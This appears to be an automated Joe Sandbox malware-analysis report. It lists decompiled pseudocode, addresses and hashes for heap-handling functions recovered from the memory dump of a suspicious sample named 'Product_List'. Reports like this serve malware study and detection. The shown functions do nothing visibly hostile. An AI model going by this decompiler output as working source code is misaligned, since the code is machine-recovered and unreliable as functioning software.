                                                      C-Code - Quality: 79%
                                                      			E0176F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0179F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01784620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                      0x0176f35d
                                                      0x0176f361
                                                      0x0176f367
                                                      0x0176f372
                                                      0x0176f38c
                                                      0x0176f38c
                                                      0x0176f394

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                      • Instruction ID: 2aea87b9ac0cb1660797eaea542f49cff325b765dff7e2edc2af4a8adff43304
                                                      • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                      • Instruction Fuzzy Hash: 98E0D832A40218FBDB21A6D9AD05F5AFFACDB54A60F000155FE04D7150D5649D00D2D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017F41E8 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E017F41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x18408f0);
				_t5 = E017BD08C(__ebx, __edi, __esi);
				if( *0x18587ec == 0) {
					L0177EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x18587ec == 0) {
						 *0x18587f0 = 0x18587ec;
						 *0x18587ec = 0x18587ec;
						 *0x18587e8 = 0x18587e4;
						 *0x18587e4 = 0x18587e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L017F4248();
				}
				return E017BD0D1(_t5);
			}





                                                      0x017f41e8
                                                      0x017f41ea
                                                      0x017f41ef
                                                      0x017f41fb
                                                      0x017f4206
                                                      0x017f420b
                                                      0x017f4216
                                                      0x017f421d
                                                      0x017f4222
                                                      0x017f422c
                                                      0x017f4231
                                                      0x017f4231
                                                      0x017f4236
                                                      0x017f423d
                                                      0x017f423d
                                                      0x017f4247

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f63b409d03ed675c3b24da99887f1d8141b2a280073c542c97e50b6af18a7774
                                                      • Instruction ID: 539c4576163071eb805ae1c35fdb6fa8cd7f74739dbb0d8591ad990a3933ba90
                                                      • Opcode Fuzzy Hash: f63b409d03ed675c3b24da99887f1d8141b2a280073c542c97e50b6af18a7774
                                                      • Instruction Fuzzy Hash: 00F03278824705CFDBB0EFBAD508759B6B4F756324F00416B92018739DCB7846A4CF01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0181D380 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0181D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0176E8B0(__ecx, _a4, 0xfff);
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                      0x0181d38a
                                                      0x0181d39b
                                                      0x0181d3b1
                                                      0x00000000
                                                      0x0181d3b6
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                      • Instruction ID: ef73cfe9b4802ed46216df9a099c5bafa1235d25960a54097492ab2b6e33afda
                                                      • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                      • Instruction Fuzzy Hash: D1E0C232280209BBDB226E84CC04F69BB1ADB507A0F204031FE089A694DA759D91D6D4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0179A185 Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0179A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x18567e4 >= 0xa) {
					if(_t5 < 0x1856800 || _t5 >= 0x1856900) {
						return L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01780010(0x18567e0, _t5);
				}
			}





                                                      0x0179a190
                                                      0x0179a1a6
                                                      0x0179a1c2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0179a192
                                                      0x0179a192
                                                      0x0179a19f
                                                      0x0179a19f

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5813b9533d8442a43dda0aab18456cc8c4d6b50068668be47857ba15f6c091c6
                                                      • Instruction ID: 7fc8c110b4da78e25c5670233850c4f6f4e248a8d083eaa8f5faa600c8a6196c
                                                      • Opcode Fuzzy Hash: 5813b9533d8442a43dda0aab18456cc8c4d6b50068668be47857ba15f6c091c6
                                                      • Instruction Fuzzy Hash: 58D05EA15E21005ACB6D7720A958B25B632F7C4760F74490DF3078B9AAFA648DDDD208
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E53CA Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E017E53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0177EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                      0x017e53ca
                                                      0x017e53ce
                                                      0x017e53d9
                                                      0x017e53de
                                                      0x017e53e1
                                                      0x017e53e1
                                                      0x017e53e6
                                                      0x017e53f3
                                                      0x00000000
                                                      0x017e53f8
                                                      0x017e53fb

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                      • Instruction ID: d9086594a1fefa66a477b09786f3f0961d2e7fb211b5c7402d5152ff765e7695
                                                      • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                      • Instruction Fuzzy Hash: 3BE08C359407849BCF12EB4CCA58F5EFBF5FB48B04F140054A0085B620CA24AC00CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017935A1 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E017935A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0177EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                      0x017935a1
                                                      0x017935a1
                                                      0x017935a5
                                                      0x017935ab
                                                      0x017935ab
                                                      0x017935b5
                                                      0x00000000
                                                      0x017935c1
                                                      0x017935b7

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                      • Instruction ID: 1936427125a1d7867ddb2eae8170ca5767615f0760ba96219ee1a919353cc810
                                                      • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                      • Instruction Fuzzy Hash: 46D0A9314011819AEF02AB38E218B68FBB2BB08208F7820A6800246866C33A4A0EC600
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177AAB0 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0177AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                      0x0177aab6
                                                      0x0177aabb
                                                      0x017ca442
                                                      0x00000000
                                                      0x017ca448
                                                      0x017ca454
                                                      0x017ca454
                                                      0x0177aac1
                                                      0x0177aac1
                                                      0x0177aac6
                                                      0x0177aac6

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                      • Instruction ID: 861a02d284bfb8289fd2d2b8c7512d7604c955cb1399eadff48777b5dea776ea
                                                      • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                      • Instruction Fuzzy Hash: 38D0E935352A80CFE617DB1DC554B15B7A4BB44B85FC50494E501CB762E62CDA44CA00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017EA537 Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E017EA537(intOrPtr _a4, intOrPtr _a8) {

				return L01788E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                      0x017ea553

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                      • Instruction ID: fe5a143fd7bb1f217835146935c3cfcbbdeb1b5474179ed04897128ccd0937ba
                                                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                      • Instruction Fuzzy Hash: 7AC08C37080248BBCB127F81CC00F06BF2AFBA8B60F008010FA080B5B0C632E970EB84
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0176DB40 Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0176DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01784620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                      0x0176db4d
                                                      0x0176db54
                                                      0x0176db5f
                                                      0x0176db56
                                                      0x0176db56
                                                      0x0176db5c
                                                      0x0176db5c

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                      • Instruction ID: 1c73cb013f4adf359e2487ab631a39728d5038f0463e9185929a06108ef48cee
                                                      • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                      • Instruction Fuzzy Hash: 6FC08C303D0A02AAEB322F20CD01B00BAA4BB50B05F4400A06701DA0F4EBB8DC01E600
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0176AD30 Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0176AD30(intOrPtr _a4) {

				return L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                      0x0176ad49

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                      • Instruction ID: 38f70f12d48eae146601bfe8ab778d4e8581b662affb3ff935f9911157349719
                                                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                      • Instruction Fuzzy Hash: 5AC02B330C0248BBC7127F45CD00F01BF2DE7A0B60F100020F6040B671C932EC60D588
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01783A1C Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E01783A1C(intOrPtr _a4) {
				void* _t5;

				return L01784620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                      0x01783a35

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                      • Instruction ID: fa3772b60fc494dd74fc5a3f9a926f44eb6b58418255d058c8af640b54c26ff0
                                                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                      • Instruction Fuzzy Hash: DBC08C32180248BBC7126E41DC00F01BB29E7A0B60F000020B6040A5608672EC60D588
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01787D50 Relevance: .0, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E01787D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                      0x01787d56
                                                      0x01787d5b
                                                      0x01787d60
                                                      0x01787d5d
                                                      0x01787d5d
                                                      0x01787d5d

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                      • Instruction ID: f0a57475ec253e1bda3f223a3ccbb88124033f998c33bafd24d44c03427124af
                                                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                      • Instruction Fuzzy Hash: 38B092353419408FCE1AEF18C080B1573E4BB44A40B9400D0E401CBA21D229E8408900
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01792ACB Relevance: .0, Instructions: 5COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E01792ACB() {
				void* _t5;

				return E0177EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                      0x01792adc

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction ID: 9b8ee03da3f3bff3b42dad66ae476d3c7ad25808eeee239ccc6ff573bb77abe8
                                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction Fuzzy Hash: 6AB01232C10441CFCF02EF44CA10F29B731FB00750F0544E1900127930C628AC01CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9560 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d312804898d668ec0bda9cffa5e39c2a3c2f236e4918f48b9d4e3935a8b66cc4
                                                      • Instruction ID: f603637f8fcf00654415b28710c74700d346bb2c93a1649f71f4020c1dfed7b8
                                                      • Opcode Fuzzy Hash: d312804898d668ec0bda9cffa5e39c2a3c2f236e4918f48b9d4e3935a8b66cc4
                                                      • Instruction Fuzzy Hash: 29900265225000070195A599464464B4445F7DA395391C035F1406590CC76198657361
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9950 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1fda4e68d17bcf0db773dcc85560028fd5820738609543db338b29ba95dc69ce
                                                      • Instruction ID: 44b8bc0f7ca23472fc473ef0ecee0e9d9eb3a7a4ab2fcb454f74b48ca5a35df9
                                                      • Opcode Fuzzy Hash: 1fda4e68d17bcf0db773dcc85560028fd5820738609543db338b29ba95dc69ce
                                                      • Instruction Fuzzy Hash: 6E9002A120540407D190659988447474005E7D4346F51C031A2054555ECB699C517175
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017AAD30 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0c619307482d12233441a361515896e251e38ddb9e858f67789e067b13711968
                                                      • Instruction ID: fe90b30f34ad79feb15b8edb9d3f42ebbd2cdf70e9ab5e570a7e4cec85ae1b67
                                                      • Opcode Fuzzy Hash: 0c619307482d12233441a361515896e251e38ddb9e858f67789e067b13711968
                                                      • Instruction Fuzzy Hash: 28900271A09000179190719988547868006F7E4785B55C031A0504554CCA949A5573E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9520 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94e5ac17d7b899e682f7112ee68202e433b2c15052caceb069d9f6c0dcfbb425
                                                      • Instruction ID: e2d6e3ba4b0e52bc7d536164c8930cda6b3f2722cfb3bc642bd84c35f2746c57
                                                      • Opcode Fuzzy Hash: 94e5ac17d7b899e682f7112ee68202e433b2c15052caceb069d9f6c0dcfbb425
                                                      • Instruction Fuzzy Hash: BD9002E1205140974550A299C444B4A8505E7E4245B51C036E1044560CC6659851B175
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A95F0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f689e4b1a9ef2a314886306251f108e6caca189061924f0c06dda616a30f584
                                                      • Instruction ID: 66aac58905a90a117dd052c1dc468bfb753f94bf712b45189f526bed4bc8236a
                                                      • Opcode Fuzzy Hash: 1f689e4b1a9ef2a314886306251f108e6caca189061924f0c06dda616a30f584
                                                      • Instruction Fuzzy Hash: 1290027120500807D154619988447C64005E7D4345F51C031A6014655ED7A598917171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A99D0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7d94ea788677e88002f66c2ce30a75d99efcf6dad63d6f0a143f9c3a9c98765d
                                                      • Instruction ID: 6d478234fd0392edcdb23718e4b98fb73d7eee0af31d784d69ca227b8da65ab7
                                                      • Opcode Fuzzy Hash: 7d94ea788677e88002f66c2ce30a75d99efcf6dad63d6f0a143f9c3a9c98765d
                                                      • Instruction Fuzzy Hash: BD9002A121500047D154619984447464045E7E5245F51C032A2144554CC6699C617165
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017AB040 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e2d5e63049fc36165e3a3daa3624b702e965f4f665e28d873d957009cb17e9a
                                                      • Instruction ID: 08c86255ee53f8fda9e8ff9c8876f1c314754c77d84506b1b5050551420947de
                                                      • Opcode Fuzzy Hash: 4e2d5e63049fc36165e3a3daa3624b702e965f4f665e28d873d957009cb17e9a
                                                      • Instruction Fuzzy Hash: F69002A1605140474590B19988445469015F7E5345391C131A0444560CC7A89855B2A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9820 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8da2fc5c6c7a00e567215799de7d94e323b739e4ace1b57646685961b2f1af26
                                                      • Instruction ID: 88489741fa43f9b4792d1b33ec615fe739c15b5e0858d83d8ee0bf807cfbb6b8
                                                      • Opcode Fuzzy Hash: 8da2fc5c6c7a00e567215799de7d94e323b739e4ace1b57646685961b2f1af26
                                                      • Instruction Fuzzy Hash: 9290027124500407D191719984447464009F7D4285F91C032A0414554EC7959A56BAA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A98A0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6b731f32e33e228e57375fe2e2c5dc26cf9ef210dff5bd7002c85a600d3205bd
                                                      • Instruction ID: ca84ee3f9963dac8c93f891b950e83fa2d701002e185c2b7f5121928949532a4
                                                      • Opcode Fuzzy Hash: 6b731f32e33e228e57375fe2e2c5dc26cf9ef210dff5bd7002c85a600d3205bd
                                                      • Instruction Fuzzy Hash: 7A90026130500407D152619984547464009E7D5389F91C032E1414555DC7659953B172
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9B00 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a8aa0298f27d27ffc580b34bd8ae491f6dde8b6d732b16a62a877c2ce7d55dd
                                                      • Instruction ID: c1b3da43006c46d3d8ddfb6d19d8affc2a9aac38784bea5331404d934b39f39a
                                                      • Opcode Fuzzy Hash: 4a8aa0298f27d27ffc580b34bd8ae491f6dde8b6d732b16a62a877c2ce7d55dd
                                                      • Instruction Fuzzy Hash: 3590026124500807D1907199C4547474006E7D4645F51C031A0014554DC756996576F1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017AA3B0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 10828792f5b3415fac0ac5d1f46d4cf5bd74ae394e8edfba1b24d9bdcb9315b9
                                                      • Instruction ID: 14110abdef2ffe152610474d4e7efb8587dd5fa55456e082c2d2b06887a1ba26
                                                      • Opcode Fuzzy Hash: 10828792f5b3415fac0ac5d1f46d4cf5bd74ae394e8edfba1b24d9bdcb9315b9
                                                      • Instruction Fuzzy Hash: 2790027120544007D1907199C48474B9005F7E4345F51C431E0415554CC7559856B261
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

